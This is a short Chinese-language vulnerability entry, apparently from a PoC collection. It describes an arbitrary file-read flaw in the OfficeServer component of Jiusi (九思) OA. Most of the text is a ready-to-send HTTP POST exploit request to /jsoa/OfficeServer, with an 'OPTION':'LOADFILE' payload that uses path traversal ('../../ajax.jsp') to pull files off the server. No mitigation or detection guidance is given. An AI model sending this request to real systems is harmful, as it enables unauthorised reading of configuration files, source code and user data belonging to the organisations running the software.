漏洞描述
文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。
九思OA OfficeServer 文件读取漏洞
PoC代码
POST /jsoa/OfficeServer?isAjaxDownloadTemplate=false HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 218
Content-Type: multipart/form-data; boundary=------------------------vdildsrhhnsidbwazmoi
Cookie:
Accept-Encoding: gzip
--------------------------vdildsrhhnsidbwazmoi
Content-Disposition: form-data; name="wswte"
{"OPTION":"LOADFILE","viewDocHistory":"1","FILENAME":"../../ajax.jsp"}
--------------------------vdildsrhhnsidbwazmoi--